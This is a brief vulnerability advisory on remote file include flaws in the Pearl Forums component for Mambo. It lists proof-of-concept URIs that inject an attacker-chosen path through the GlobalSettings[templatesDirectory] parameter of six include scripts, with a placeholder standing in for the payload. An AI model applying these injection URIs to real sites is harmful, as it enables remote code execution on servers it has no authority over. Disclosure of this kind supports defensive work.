|
Pearl Forums for Mambo Multiple Remote File Include Vulnerabilities
An attacker may exploit these issues using a web client. The following proof-of-concept URIs are available: http://www.example.com/[path]/includes/admin.php?templatesDirectory-evill code http://www.example.com//[path]/includes/password.php?GlobalSettings[templatesDirectory]=evill code http://www.example.com//[path]/includes/profile.php?GlobalSettings[templatesDirectory]=evill code http://www.example.com//[path]/includes/merge.php?GlobalSettings[templatesDirectory]=evill code http://www.example.com//[path]/includes/adminPolls.php?GlobalSettings[templatesDirectory]=evill code http://www.example.com//[path]/includes/poll.php?GlobalSettings[templatesDirectory]=evill code |
|
|
Privacy Statement |
